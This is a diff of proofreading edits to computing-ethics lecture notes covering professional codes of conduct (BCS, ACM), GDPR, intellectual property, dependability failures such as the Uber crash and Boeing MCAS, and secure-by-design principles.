- Short term dopamine-driven feedback loops - Chamath Palihapitya (ex Facebook VP) - Short-term dopamine-driven feedback loops - Chamath Palihapitya (ex Facebook VP)
- Self-harm - Self-harm
- Enables people to research self harm methods - Enables people to research self-harm methods
- Validates negative feelings - Validates negative feelings
- Legitimise suicide as an acceptable course of action - Legitimises suicide as an acceptable course of action
## Threats to our way of life ## Threats to our way of life
- Manipulating public opinion - Manipulating public opinion
- Can be state sanctioned - Can be state-sanctioned
- Distribution of inaccurate information, disinformation and fake news - Distribution of inaccurate information, disinformation and fake news
- The Oxford internet institute found 26 countries including China, Turkey and Russia were using computational propaganda to suppress human rights and discredit political opposition - The Oxford internet institute found 26 countries including China, Turkey and Russia were using computational propaganda to suppress human rights and discredit political opposition
### Risk to critical national infrastructure ### Risk to critical national infrastructure
- Cyber attacks on nuclear power stations, electricity grids, banking communications - Cyber attacks on nuclear power stations, electricity grids, banking communications
- WannaCry targeting the NHS - WannaCry targeting the NHS
## Environmental Impact ## Environmental Impact
- Data centres consume huge amounts of energy - Data centres consume huge amounts of energy
- Consumed 416.2 TWH of electricity - more than the total UK’s power consumption - Consumed 416.2 TWH of electricity - more than the UK’s total power consumption
- 3% of global electricity supply - 3% of global electricity supply
- 2% of greenhouse gas emissions - 2% of greenhouse gas emissions
## GDPR ## GDPR
- Data protection - Data protection
- Data is the oil of the digital economy - Data is the oil of the digital economy
- **GDPR** applies to the processing of personal data by automated means, regardless of whether the processing takes place in the EU or not relating to: - **GDPR** applies to the processing of personal data by automated means, regardless of whether the processing takes place in the EU or not relating to:
- The offering of goods or services to EU citizens - The offering of goods or services to EU citizens
- The monitoring of their behaviour - The monitoring of their behaviour
- There are stiff fines for those who break GDPR - There are stiff fines for those who break GDPR
- £20,000,000 or 4% of total annual turnover - whichever is greater. - £20,000,000 or 4% of total annual turnover - whichever is greater.
# A world under attack # A world under attack
It’s not computer scientists who do harm, but the way the technology is designed, who designed it and the outcomes it is trying to achieve influence how it impacts its users and wider society. It’s not computer scientists who do harm, but the way the technology is designed, who designed it and the outcomes it is trying to achieve influence how it impacts its users and wider society.
+31 -27
View File
@@ -5,23 +5,27 @@
## Morally permissible ## Morally permissible
- Morality is ubiquitous, as moral standards apply to everyone - Morality is ubiquitous, as moral standards apply to everyone
- Professional ethics only apply to the members of particular groups (such as lawyers, doctors etc) - Professional ethics only apply to the members of particular groups (such as lawyers, doctors, etc.)
**Ethical does not equal moral** **Ethical does not equal moral**
>For example it is against ethical standards in the USA for doctors to advertise prices for their services, but there is nothing inherently immoral about advertising prices for services. >For example it is against ethical standards in the USA for doctors to advertise prices for their services, but there is nothing inherently immoral about advertising prices for services.
- An action may be morally permissible but unethical - An action may be morally permissible but unethical
- It is also possible to behave ethically but apparently immorally - It is also possible to behave ethically but apparently immorally
- Professional ethics requires that one behaves consistently with the standards of the group. - Professional ethics requires that one behaves consistently with the standards of the group.
**Professional ethics is a subset of moral concerns** **Professional ethics is a subset of moral concerns**
- Morality encompasses societal reasoning and norms of conduct as to what constitutes right and wrong - Morality encompasses societal reasoning and norms of conduct as to what constitutes right and wrong
- Professional ethics govern professional practice with respect to particular moral issues or challenges like *algorithmic decisions* - Professional ethics govern professional practice with respect to particular moral issues or challenges like *algorithmic decisions*
- As the broader social-moral order evolves so do professional ethics, like ACM Code of Ethics - As the broader social-moral order evolves, so do professional ethics, like the ACM Code of Ethics
## Standards ## Standards
Govern professional practice Govern professional practice
Standards consist of: Standards consist of:
- Principles - Principles
- Rules of Conduct - Rules of Conduct
- Embedded in code of conduct or code of ethics - Embedded in code of conduct or code of ethics
@@ -29,11 +33,12 @@ Standards consist of:
>A professional puts profession first. When a conflict arises between the professional's code and the policy of an employer or the law, the professional's code must take precedence - Brinkman & Sanders, *Ethics in Computing Culture.* Boston: Cengage Learning, 2013. >A professional puts profession first. When a conflict arises between the professional's code and the policy of an employer or the law, the professional's code must take precedence - Brinkman & Sanders, *Ethics in Computing Culture.* Boston: Cengage Learning, 2013.
### Shared by a Group ### Shared by a Group
Standards are shared by a cohort of people engaged in professional activity Standards are shared by a cohort of people engaged in professional activity
**What constitutes professional activity?** **What constitutes professional activity?**
- Provides an important service to soceity - Provides an important service to society
- Requires extensive training - Requires extensive training
- Involves significant intellectual effort - Involves significant intellectual effort
- Organisation of members - Organisation of members
@@ -41,15 +46,19 @@ Standards are shared by a cohort of people engaged in professional activity
- Certification or Licensing - Certification or Licensing
#### Is computing a profession? #### Is computing a profession?
The problematic static of computing The problematic static of computing
- Lack of accreditation, certification or licensing - Lack of accreditation, certification or licensing
+ No single organisation of members for the computing profession - No single organisation of members for the computing profession
Question is immaterial:
The harms enabled by computing mean that computing professionals still have important ethical obligations Question is immaterial:
The harms enabled by computing mean that computing professionals still have important ethical obligations
>Programmers need ethics when designing the technologies that influence people's lives - President of the ACM >Programmers need ethics when designing the technologies that influence people's lives - President of the ACM
We still need professional ethics in computing even if computings professional status is dubitable. We still need professional ethics in computing even if computing’s professional status is dubitable.
- We need ethics if we are to be considered professionals - We need ethics if we are to be considered professionals
> It is impossible to satisfy the definition of profession without a code of ethics, impossible to teach 'professionalism' without teaching the code, and indeed impossible to understand professions without understanding them as bound by such a code. Without a code of ethics, there are only honest occupations, trade associations, and the like - Micheal Davis > It is impossible to satisfy the definition of profession without a code of ethics, impossible to teach 'professionalism' without teaching the code, and indeed impossible to understand professions without understanding them as bound by such a code. Without a code of ethics, there are only honest occupations, trade associations, and the like - Micheal Davis
@@ -72,18 +81,18 @@ These standards require:
- Only undertake to do work or provide a service that is within your professional competence - Only undertake to do work or provide a service that is within your professional competence
- Do not claim a level of competence that you do not possess - Do not claim a level of competence that you do not possess
- Continue to develop professional knowledge relevant to your field - Continue to develop professional knowledge relevant to your field
- Ensure that you have the knowledge and understanding of relevent legislation - Ensure that you have the knowledge and understanding of relevant legislation
- Respect and value alternate viewpoints - Respect and value alternate viewpoints
- Avoid injuring others - Avoid injuring others
- Reject and will not make any offer of bribery or unethical inducement - Reject and do not make any offer of bribery or unethical inducement
##### Duty to relevant authority ##### Duty to relevant authority
- Carry out your professional responsiblities with due care and diligence - Carry out your professional responsibilities with due care and diligence
- Avoid situations that conflict with the interests of relevant authorities - Avoid situations that conflict with the interests of relevant authorities
- Accept professioal responsibilities for your work - Accept professional responsibilities for your work
- Do not disclose confidential information - Do not disclose confidential information
- Do not misrepresent or withhold information on the performance of products, system or services - Do not misrepresent or withhold information on the performance of products, systems or services
##### Duty to Profession ##### Duty to Profession
@@ -105,7 +114,7 @@ Covers about half of what the BCS covers, little attention to duty to relevant a
25 principles governing professional conduct 25 principles governing professional conduct
- 7 general ethical principles - 7 general ethical principles
- 9 principles governing professional responsiblities - 9 principles governing professional responsibilities
- 7 principles of professional leadership - 7 principles of professional leadership
- 2 principles of compliance - 2 principles of compliance
@@ -117,25 +126,25 @@ Covers about half of what the BCS covers, little attention to duty to relevant a
- Be fair and take action not to discriminate - Be fair and take action not to discriminate
- Respect the work of others - Respect the work of others
- Respect privacy - Respect privacy
- Honor confidentiality - Honour confidentiality
- Unless in cases in which it is evidence of the violation of law or the code itself - Unless in cases in which it is evidence of the violation of law or the code itself
This links to the BCS public interest requirement This links to the BCS public interest requirement
##### Professional responsibilities ##### Professional responsibilities
- Strive to achieve high quality work - Strive to achieve high-quality work
- Maintain high standards to professional competence - Maintain high standards of professional competence
- Know and respect rules pertaining to professional work - Know and respect rules pertaining to professional work
- Accept and provide appropriate professional review - Accept and provide appropriate professional review
- Evaluate computer systems and possible risks - Evaluate computer systems and possible risks
- Providing objective evaluations for employers or clients - Providing objective evaluations for employers or clients
- Perform work only in areas of competence - Perform work only in areas of competence
- Foster public awareness and understanding of computing - Foster public awareness and understanding of computing
- Access computing only when authorised or for public good - Access computing only when authorised or for public good
- Basically **do not hack**, unless it is to disrupt or inhibit malicious systems - Basically **do not hack**, unless it is to disrupt or inhibit malicious systems
- Design and implement robust and secure systems - Design and implement robust and secure systems
- Does not link to BCS code however important - Does not link to BCS code however important
##### Professional leadership Principles ##### Professional leadership Principles
@@ -143,8 +152,8 @@ This links to the BCS public interest requirement
- Promote social responsibility - Promote social responsibility
- Enhance quality of working life - Enhance quality of working life
- Support the principles of the code - Support the principles of the code
- Create oppotunities for professional development - Create opportunities for professional development
- User care when modifying or retiring systems - Use care when modifying or retiring systems
- Take special care of systems integrated in societal infrastructure - Take special care of systems integrated in societal infrastructure
##### Compliance with the Code ##### Compliance with the Code
@@ -158,8 +167,3 @@ This links to the BCS public interest requirement
- More to the ACM code - More to the ACM code
- But a strong relationship between the two exists, although it is not always direct - But a strong relationship between the two exists, although it is not always direct
+13 -14
View File
@@ -2,7 +2,7 @@
The coursework issue is about a class action lawsuit against Ring. The coursework issue is about a class action lawsuit against Ring.
file: <studentID>_Surname file: `<studentID>_Surname`
## Example of applying Codes ## Example of applying Codes
@@ -25,23 +25,23 @@ The example is taken from the ACM code of ethics - case study 5
#### Which principles apply to Blocker Plus? #### Which principles apply to Blocker Plus?
- `1.1` Contribute to society and human well-being - `1.1` Contribute to society and human well-being
- Socially responsible uses of computing - Socially responsible uses of computing
- `2.3` Know and respect rules pertaining to professional work - `2.3` Know and respect rules pertaining to professional work
- This is broken as a federal law is being broken - This is broken as a federal law is being broken
- `2.5` Evaluate computer systems and their impacts, including risks - `2.5` Evaluate computer systems and their impacts, including risks
- Extraordinary care be taken to identify and mitigate potential risks. Blocker Plus violates this principle by allowing its feedback algorithm to be manipulated by activists to corrupt the classification model. - Extraordinary care should be taken to identify and mitigate potential risks. Blocker Plus violates this principle by allowing its feedback algorithm to be manipulated by activists to corrupt the classification model.
- `2.9` Design and implement robustly and usably secure systems - `2.9` Design and implement robustly and usably secure systems
- 2.9 requires that computing professionals should perform due diligence to ensure systems function as intended, and take appropriate action to secure resources against accidental and intentional misuse, modification or denial of service. That the activists were able to intentionally misuse Blocker Plus means that the system violates this principle - 2.9 requires that computing professionals should perform due diligence to ensure systems function as intended, and take appropriate action to secure resources against accidental and intentional misuse, modification or denial of service. That the activists were able to intentionally misuse Blocker Plus means that the system violates this principle
- `1.2` Avoid harm - `1.2` Avoid harm
- Avoid harm applies as the corruption of the machine learning model means that information of legitimate public interest (gay & lesbian marriage) and safety (vaccinations and climate change) is suppressed by the activists' intentional misuse of the system - Avoid harm applies as the corruption of the machine learning model means that information of legitimate public interest (gay & lesbian marriage) and safety (vaccinations and climate change) is suppressed by the activists' intentional misuse of the system
- `1.4` Be fair and do not discriminate - `1.4` Be fair and do not discriminate
- This applies in the respect of suppression of information of legitimate public interest enables discrimination of the basis of sex and sexual orientation - This applies in the respect that suppression of information of legitimate public interest enables discrimination on the basis of sex and sexual orientation
- `3.7` Take special care of systems integrated into societal infrastructure - `3.7` Take special care of systems integrated into societal infrastructure
- Applies as Blocker Plus is designed for educational purposes. In failing to prevent intentional misuse of the system, the leadership of Blocker Plus have failed in their responsibility to be good stewards of the system and enabling fair access. - Applies as Blocker Plus is designed for educational purposes. In failing to prevent intentional misuse of the system, the leadership of Blocker Plus have failed in their responsibility to be good stewards of the system and enable fair access.
Codes for the coursework only apply in negative reasons, e.g. 1.1 may apply as amazon wished to contribute to society and human well being. However this will not be marked. Codes for the coursework only apply for negative reasons, e.g. 1.1 may apply as Amazon wished to contribute to society and human well-being. However, this will not be marked.
There is one code in the amazon ring that there is no evidence of, however it is inferred by a *lack* of action. There is one code in the Amazon Ring case that there is no evidence of; however, it is inferred by a *lack* of action.
## The ACM CARE Framework ## The ACM CARE Framework
@@ -55,19 +55,18 @@ What were the observable effects of Amazon's actions or decisions for Ring users
##### Analyse ##### Analyse
What stakeholder rights (legal, natural or social) were impacted and to what extent, and ask what principles of the code are relevent here. What stakeholder rights (legal, natural or social) were impacted and to what extent, and ask what principles of the code are relevant here.
> What stakeholder rights (legal, natural, or social) were impacted and to what extent? What technical facts are most relevant to the actors’ decision? What principles of the Code were most relevant? What personal, institutional, or legal values should be considered? > What stakeholder rights (legal, natural, or social) were impacted and to what extent? What technical facts are most relevant to the actors’ decision? What principles of the Code were most relevant? What personal, institutional, or legal values should be considered?
##### Review ##### Review
What potential actions could changed the outcomes What potential actions could have changed the outcomes
> What responsibilities, authority, practices, or policies shaped the actors’ choices? What potential actions could have changed the outcomes? > What responsibilities, authority, practices, or policies shaped the actors’ choices? What potential actions could have changed the outcomes?
##### Evaluate ##### Evaluate
What actions (or lack of actions) supported or violated the Code. Are the actions taken in this case justified, particularly when considering the rights of and impact on all stakeholders. What actions (or lack of actions) supported or violated the Code? Are the actions taken in this case justified, particularly when considering the rights of and impact on all stakeholders?
> How might the decision in this case be used as a foundation for similar future cases? What actions (or lack of action) supported or violated the Code? Are the actions taken in this case justified, particularly when considering the rights of and impact on all stakeholders? > How might the decision in this case be used as a foundation for similar future cases? What actions (or lack of action) supported or violated the Code? Are the actions taken in this case justified, particularly when considering the rights of and impact on all stakeholders?
@@ -20,7 +20,7 @@ This means:
- Appropriate steps are taken to avoid harm - Appropriate steps are taken to avoid harm
- Systems are robust, secure and respect privacy - Systems are robust, secure and respect privacy
- Rules are followed - Rules are followed
- Special care is taken when modifying or retiring systems or systems are integrated in societal infrastructure - Special care is taken when modifying or retiring systems or when systems are integrated into societal infrastructure
### Public Good ### Public Good
@@ -32,17 +32,17 @@ This means:
- Entirely natural - Entirely natural
- Can be mitigated - Can be mitigated
- Draws our attention to micro-issues - Draws our attention to micro-issues
- for example discriminate against people of tattoos, or people with piercings - For example, discriminating against people with tattoos or people with piercings
- Can have an squally detrimental effect as the big issues - Can have an equally detrimental effect as the big issues
- Design to minimise unconscious bias - Design to minimise unconscious bias
### Respect the Work of Others ### Respect the Work of Others
- Do no harm - Do no harm
- Do not hack - Do not hack
- Unless public good requires it or you are authorised to do so - Unless public good requires it or you are authorised to do so
- Respect intellectual property rights (IPR) - Respect intellectual property rights (IPR)
- Relevant types of IPR: trade marks, industrial designs, patents, trade secrets, databases & domain names - Relevant types of IPR: trade marks, industrial designs, patents, trade secrets, databases & domain names
#### IPR #### IPR
@@ -61,16 +61,16 @@ Distinctive elements of a product
Used where products have a short design life e.g. fashion Used where products have a short design life e.g. fashion
- Two types of protection - Two types of protection
- Registered Community designs (RCD) - Registered Community designs (RCD)
- Protection lasts **5** years, renewed up to **25** years - Protection lasts **5** years, renewed up to **25** years
- Unregistered Community designs (UCD) - Unregistered Community designs (UCD)
- Protection lasts for **3** years - Protection lasts for **3** years
###### Patent ###### Patent
- An exclusive right granted to protect an invention - An exclusive right granted to protect an invention
- Prevents others from making, using, offering for sale, selling or importing invention without owner's permission - Prevents others from making, using, offering for sale, selling or importing invention without owner's permission
- Lasts for **20** years from date of filed - Lasts for **20** years from the filing date
- Costs between $3,000 and \$6,000 - Costs between $3,000 and \$6,000
- Can't patent a computer program only a "computer-implemented invention" - Can't patent a computer program only a "computer-implemented invention"
@@ -85,31 +85,31 @@ Used where products have a short design life e.g. fashion
- Confidential business information that provides a competitive advantage - Confidential business information that provides a competitive advantage
- Must put reasonable measures in place to keep it a secret - Must put reasonable measures in place to keep it a secret
- Store safely, implement NDAs - Store safely, implement NDAs
- Do not confer proprietary rights - Do not confer proprietary rights
- Protected by law for an unlimited time period - Protected by law for an unlimited time period
###### Copyright ###### Copyright
- Author's or creator's right to protection over uses of their work - Author's or creator's right to protection over uses of their work
- Ideas cannot be copyrighted, only the concrete implementation of the idea - Ideas cannot be copyrighted, only the concrete implementation of the idea
- Obtained automatically - Obtained automatically
- Includes economic rights (renumeration for use by others)] - Includes economic rights (remuneration for use by others)
- Fair use allowed - Fair use allowed
- Covers life-time of owners plus **50-70** years - Covers lifetime of owners plus **50-70** years
###### Databases ###### Databases
- A systematic arrangement of data, works or materials - A systematic arrangement of data, works or materials
- Two forms: - Two forms:
- Original - Original
- Protection lasts lifetime + 50-70 years - Protection lasts lifetime + 50-70 years
- Non-original (like a phone directory) - Non-original (like a phone directory)
- Protected by *sui generis* database right which lasts for **15** years - Protected by *sui generis* database right which lasts for **15** years
###### Domain Names ###### Domain Names
- Registered by ICANN registars - Registered by ICANN registrars
- Not protected by copyright - Not protected by copyright
- May be protected by a registered trade mark - May be protected by a registered trade mark
- Last up to **10** years, renewed indefinitely - Last up to **10** years, renewed indefinitely
@@ -118,11 +118,11 @@ Used where products have a short design life e.g. fashion
Don't go too far in protecting your own works Don't go too far in protecting your own works
###### Sony Rookit ###### Sony Rootkit
They produced CDs that when entered into a computer downloaded a rootkit which gained administrator control on the victims computer. They produced CDs that, when inserted into a computer, downloaded a rootkit which gained administrator control on the victim’s computer.
Rookit modified the victims OS, limiting the users ability to use the CD. The rootkit modified the victim’s OS, limiting the user’s ability to use the CD.
**Profoundly unethical and illegal** **Profoundly unethical and illegal**
+26 -26
View File
@@ -2,7 +2,7 @@
### What is a dependable System ### What is a dependable System
Another way of putting it is that computing systems, especially systems built into societal infrastructure, and which are otherwise safety-critical as London ambulance system was, are **dependable**. Another way of putting it is that computing systems, especially systems built into societal infrastructure, and which are otherwise safety-critical as the London ambulance system was, are **dependable**.
**Dependability** is defined by Brian Randell as the **trustworthiness** of a computer system such that reliance can justifiably be placed on the service it delivers. Dependability thus includes such properties as: **Dependability** is defined by Brian Randell as the **trustworthiness** of a computer system such that reliance can justifiably be placed on the service it delivers. Dependability thus includes such properties as:
@@ -15,11 +15,11 @@ Another way of putting it is that computing systems, especially systems built in
And provides a convenient means of subsuming these various concerns within a single conceptual framework. And provides a convenient means of subsuming these various concerns within a single conceptual framework.
**Reliability** means that a system provides continuity of correct service during its useful lifetime, from commisioning, through operation, to decomissioning. **Reliability** means that a system provides continuity of correct service during its useful lifetime, from commissioning, through operation, to decommissioning.
**Safety** means that a system is engineered to avoid catastrophic consequences for user and the environment and that the life-critical system behaves as needed, even if components fail. **Safety** means that a system is engineered to avoid catastrophic consequences for users and the environment and that the life-critical system behaves as needed, even if components fail.
**Integrity** means that a system’s source code or state cannot be altered improperly, i.e., it is secure, or its data be corrupted. **Integrity** means that a system’s source code or state cannot be altered improperly, i.e., it is secure, or its data cannot be corrupted.
**Maintainability** means that a system is engineered to permit adaptive maintenance, ease of modification and repair of defects. **Maintainability** means that a system is engineered to permit adaptive maintenance, ease of modification and repair of defects.
@@ -27,27 +27,27 @@ And provides a convenient means of subsuming these various concerns within a sin
##### Uber’s self-driving car accident ##### Uber’s self-driving car accident
- Back up drivber charged with negligent homicide - Backup driver charged with negligent homicide
- However the National Transport Safety Board finds ubers system to be at fault - However, the National Transport Safety Board finds Uber’s system to be at fault
- While Uber’s radar and Lidar detected Elaine 6 seconds before the impact, their system did not have the capacity to **classify** the object as a pedestrian unless they were near a crosswalk - While Uber’s radar and Lidar detected Elaine 6 seconds before the impact, their system did not have the capacity to **classify** the object as a pedestrian unless they were near a crosswalk
- It classified Elaine as a vehicle, bicycle and an unknown object - It classified Elaine as a vehicle, bicycle and an unknown object
- It assumed Elaine would be travelling in the same direction as the car and therefore did not slow down - It assumed Elaine would be travelling in the same direction as the car and therefore did not slow down
- Furthermore, the car had its own in-built automatic braking system which was capable of detecting and stopping for Elaine, but it was disabled by Uber engineers as they thought it would interfere with Uber’s self driving sensors - Furthermore, the car had its own in-built automatic braking system which was capable of detecting and stopping for Elaine, but it was disabled by Uber engineers as they thought it would interfere with Uber’s self-driving sensors
- When the car was just a second away from Elaine, Uber’s system finally recognised that the object could not be avoided - When the car was just a second away from Elaine, Uber’s system finally recognised that the object could not be avoided
- Now at this point, Uber’s system could have slammed on the brakes to migate the imapact, instead an *action supression* component kicked in. - Now at this point, Uber’s system could have slammed on the brakes to mitigate the impact; instead, an *action suppression* component kicked in.
- This was implemented to avoid extreme manoeuvers in response to false alarms. - This was implemented to avoid extreme manoeuvres in response to false alarms.
- Uber couldn’t supply documents showing checks performed on the backup driver - Uber couldn’t supply documents showing checks performed on the backup driver
Computing failures are not restricted to 1 car and 2 plane crashes Computing failures are not restricted to 1 car and 2 plane crashes
The FDA reports, that medical device recalls are at an all time high and that defective software is a major cause. One in every three medical devices that use software for operations have been **recalled** because of **failures in their software**. The FDA reports that medical device recalls are at an all-time high and that defective software is a major cause. One in every three medical devices that use software for operations has been **recalled** because of **failures in their software**.
As the Uber and Boeing cases clearly demonstrate, dependability is still a critical issue in computing today. As the Uber and Boeing cases clearly demonstrate, dependability is still a critical issue in computing today.
- Apart from the direct human cost, the failure of computing systems costs a great deal of money. - Apart from the direct human cost, the failure of computing systems costs a great deal of money.
- The 5th edition of the Software Fail Watch identified 606 recorded software failures, impacting half of the world’s population (3.7 billion people) and 314 companies to the cost of 1.7 trillion dollars, and noted that “this is just scratching the surface – there are far more software defects in the world than we will likely ever know about.” - The 5th edition of the Software Fail Watch identified 606 recorded software failures, impacting half of the world’s population (3.7 billion people) and 314 companies to the cost of 1.7 trillion dollars, and noted that “this is just scratching the surface – there are far more software defects in the world than we will likely ever know about.”
We have an ethical duty to the public to minimise these harms. I purposefully say minimise and not eradicate, as it is inevitable that things will go wrong some-times due to unforeseen circumstances, but if we exercise due diligence in our work then we should be able to significantly reduce the harms caused through what are euphemistically called “software bugs”. We have an ethical duty to the public to minimise these harms. I purposefully say minimise and not eradicate, as it is inevitable that things will go wrong sometimes due to unforeseen circumstances, but if we exercise due diligence in our work then we should be able to significantly reduce the harms caused through what are euphemistically called “software bugs”.
#### Software Bugs #### Software Bugs
@@ -70,7 +70,7 @@ The V Model adapts the waterfall by placing an emphasis on early testing
###### Spiral Model ###### Spiral Model
Spiral model provides a major alternative and places testing, in iterative requirements, design, implement and test sequences that spiral out from one another and are marked by the development of increasingly high fidelity prototypes Spiral model provides a major alternative and places testing in iterative requirements, design, implement and test sequences that spiral out from one another and are marked by the development of increasingly high-fidelity prototypes
##### Testing Methodologies ##### Testing Methodologies
@@ -106,10 +106,10 @@ Graphical user interface or GUI testing
- Checks user interface works as per the GUI specification. - Checks user interface works as per the GUI specification.
- It tests the software control dialogues, including: - It tests the software control dialogues, including:
- screen layouts - screen layouts
- menus - menus
- buttons - buttons
- icons, pop-up windows, text boxes, text formatting, colours, fonts, font sizes, etc. - icons, pop-up windows, text boxes, text formatting, colours, fonts, font sizes, etc.
##### Testing Levels ##### Testing Levels
@@ -143,21 +143,21 @@ Daniel Jackson and colleagues elaborate the point, saying that,
The bug at work here was a **faulty** angle of attack or AOA **sensor**, which indicated the angle at which the aircraft was positioned in flight. The bug at work here was a **faulty** angle of attack or AOA **sensor**, which indicated the angle at which the aircraft was positioned in flight.
The Ethiopian accident investigation report says that Boeing’s engineers determined that no piloted simulation, was required for take-off or low speed flight. This meant that specific failures that could lead to MCAS activation, such as false AOA input, were not simulated as part of the aircraft’s functional hazard assessment and validation tests. The Ethiopian accident investigation report says that Boeing’s engineers determined that no piloted simulation was required for take-off or low-speed flight. This meant that specific failures that could lead to MCAS activation, such as false AOA input, were not simulated as part of the aircraft’s functional hazard assessment and validation tests.
Boeing assumed that the worse that could happen would be single fault-driven MCAS activation that flight crew would correct as per “trained memory procedures” acquired during flight training for previous 737 models. As the graph showing the plane going up and down in the Vox video makes painfully visible, the MAX 8 crashes involved multiple MCAS activations, caused by the faulty AOA sensor. Boeing assumed that the worst that could happen would be single fault-driven MCAS activation that flight crew would correct as per “trained memory procedures” acquired during flight training for previous 737 models. As the graph showing the plane going up and down in the Vox video makes painfully visible, the MAX 8 crashes involved multiple MCAS activations, caused by the faulty AOA sensor.
Poor specification requirements: Input was only required from one AOA sensor to activate MCAS, depsite two sensors being fitted. Poor specification requirements: Input was only required from one AOA sensor to activate MCAS, despite two sensors being fitted.
- This means the faulty sensor constantly triggered MCAS - This means the faulty sensor constantly triggered MCAS
- No information about MCAS was given in the flight crew manuals and MCAS was not included in flight crew training. - No information about MCAS was given in the flight crew manuals and MCAS was not included in flight crew training.
- Boeing assumed that pilots certified to fly on earlier versions of the 737 didn’t need any extra training. - Boeing assumed that pilots certified to fly on earlier versions of the 737 didn’t need any extra training.
- The lack of documentation and training meant that flight crews were unaware of MCAS and its effects - The lack of documentation and training meant that flight crews were unaware of MCAS and its effects
- The lack of information about MCAS in the flight crew manual meant that there were no procedures for mitigating erroneous input from the AOA sensors - The lack of information about MCAS in the flight crew manual meant that there were no procedures for mitigating erroneous input from the AOA sensors
- An AOA disagree warning light would flash if the two sensors were at odds with each other - An AOA disagree warning light would flash if the two sensors were at odds with each other
- These indicators were sold as optional extras - These indicators were sold as optional extras
- These extras were not found on either aircraft - These extras were not found on either aircraft
- The Indonesian crash report finds that the flight crew were **not aware** that the AOA DISAGREE warning would not appear if AOA DISAGREE conditions were met, and that in failing to install the warning lights **Boeing denied the flight crew valid information** about the abnormal conditions they faced - The Indonesian crash report finds that the flight crew were **not aware** that the AOA DISAGREE warning would not appear if AOA DISAGREE conditions were met, and that in failing to install the warning lights **Boeing denied the flight crew valid information** about the abnormal conditions they faced
It becomes apparent then that the **AOA sensor bug wasn’t really the problem**. It could well have been handled It becomes apparent then that the **AOA sensor bug wasn’t really the problem**. It could well have been handled
+42 -45
View File
@@ -10,27 +10,27 @@ Security is legally required for systems that process personal data.
#### Why is Security so Important #### Why is Security so Important
In the UK 46% of businesses and 26% of charities have delt with cyber attacks In the UK 46% of businesses and 26% of charities have dealt with cyber attacks
Ransomware is the fastest growing type of cybercrime and costs are predicted to reach 20 billion dollars by 2021, which is 57 times greater than it was in 2015. Ransomware is the fastest-growing type of cybercrime and costs are predicted to reach 20 billion dollars by 2021, which is 57 times greater than it was in 2015.
Cyber security breaches have increased globally by 67% since 2014. They essentially operate in 2 ways: Cyber security breaches have increased globally by 67% since 2014. They essentially operate in 2 ways:
1. Through bad actors, particularly people who try to phish for and otherwise elicit usernames and passwords to access systems 1. Through bad actors, particularly people who try to phish for and otherwise elicit usernames and passwords to access systems
2. Through bad computing, particularly the use of viruses, malware and denial of service attacks that compromise systems. 2. Through bad computing, particularly the use of viruses, malware and denial of service attacks that compromise systems.
It is broadly acknowledged that IoT devices, which typically exploit low cost sensors, suffer from extremely poor and indeed non-existent security. It is broadly acknowledged that IoT devices, which typically exploit low-cost sensors, suffer from extremely poor and indeed non-existent security.
#### Causes of poor Security #### Causes of poor Security
In addition to internal reasons to do with poor coding and testing, and poor specification of technical and usability requirements, poor security has also been attributed to the law and limits of liability. In addition to internal reasons to do with poor coding and testing, and poor specification of technical and usability requirements, poor security has also been attributed to the law and limits of liability.
In the US, for example, the courts have consistently interpreted software licenses in a way that allows vendors to disclaim almost all liability for software defects. In the US, for example, the courts have consistently interpreted software licences in a way that allows vendors to disclaim almost all liability for software defects.
**The economic loss**: rule states that if a product causes no personal injury or property damage, other than to the product itself, then such damages are determined by contract law and limited to a breach of contract claim. **The economic loss**: rule states that if a product causes no personal injury or property damage, other than to the product itself, then such damages are determined by contract law and limited to a breach of contract claim.
- This prevents customers from suing as most often claims consist of - This prevents customers from suing as most often claims consist of
- Loss of sensitive & personal data - Loss of sensitive & personal data
Then there is the fact that any data entered into a computer system by the user is **not considered part of the software**, and hence **not part of the product**. The data and the software are separate. The data can be read and manipulated by the software, but it is created by the user or a third party, not the software vendor. Therefore, destruction of data due to insecure software is not deemed damage to or destruction of the software itself. Then there is the fact that any data entered into a computer system by the user is **not considered part of the software**, and hence **not part of the product**. The data and the software are separate. The data can be read and manipulated by the software, but it is created by the user or a third party, not the software vendor. Therefore, destruction of data due to insecure software is not deemed damage to or destruction of the software itself.
@@ -38,7 +38,7 @@ Now GDPR, the EU’s updated data protection regulation, goes some way towards i
#### National Cyber Security Strategy #### National Cyber Security Strategy
UK Govement invested £1.9 bn in its National Cyber Security strategy in 2016. UK Government invested £1.9 bn in its National Cyber Security strategy in 2016.
The UK’s National Cyber Security Strategy stands on 3 pillars: The UK’s National Cyber Security Strategy stands on 3 pillars:
@@ -55,36 +55,36 @@ Cyber-physical systems include software systems that not only compute but also a
NCSC articulates **5 core secure by design principles**. These include: NCSC articulates **5 core secure by design principles**. These include:
1. Establishing the context before designing a system 1. Establishing the context before designing a system
- Risk analysis is **critical** - Risk analysis is **critical**
- Component-driven analysis and system-driven analysis (see below) - Component-driven analysis and system-driven analysis (see below)
2. Making compromise difficult 2. Making compromise difficult
- External data inputs cannot be trusted - External data inputs cannot be trusted
- Data inputs must be sanitised, validated - Data inputs must be sanitised, validated
- Attack surfaces should be minimised, exposing as few components as possible - Attack surfaces should be minimised, exposing as few components as possible
- Read-only views should be enforced where ever possible - Read-only views should be enforced wherever possible
- All privileged actions should be accessed through control functions and must be attributed to individuals - All privileged actions should be accessed through control functions and must be attributed to individuals
3. Making disruption difficult 3. Making disruption difficult
- Identify system bottlenecks - Identify system bottlenecks
- Test systems with unreasonably high loads and Ddos attacks - Test systems with unreasonably high loads and DDoS attacks
- Understanding how the system responds to failure - Understanding how the system responds to failure
- Monkey testing - Monkey testing
4. Making compromise detection easier 4. Making compromise detection easier
- Monitoring system behaviour - Monitoring system behaviour
- Logging security events - Logging security events
- Like a log of all logins and logouts - Like a log of all logins and logouts
- Ensuring the monitoring is independent of the software itself - Ensuring the monitoring is independent of the software itself
5. Reducing the impact of compromise. 5. Reducing the impact of compromise.
- Removing unnecessary functionality such as debug or test functionality - Removing unnecessary functionality such as debug or test functionality
- Segmenting assets on networks to contain breaches to particular segments - Segmenting assets on networks to contain breaches to particular segments
- Designing systems so that they can be quickly rebuilt to a known clean state - Designing systems so that they can be quickly rebuilt to a known clean state
###### Component-driven Analysis ###### Component-driven Analysis
Focuses on the technical components a system is composed of, the threats and vulnerabilities that may effect those components, and the impact caused if any of the components was compromised. Focuses on the technical components a system is composed of, the threats and vulnerabilities that may affect those components, and the impact caused if any of the components was compromised.
This type of analysis allows the specific risks faced by specific components within a system to be identified and prioritised This type of analysis allows the specific risks faced by specific components within a system to be identified and prioritised
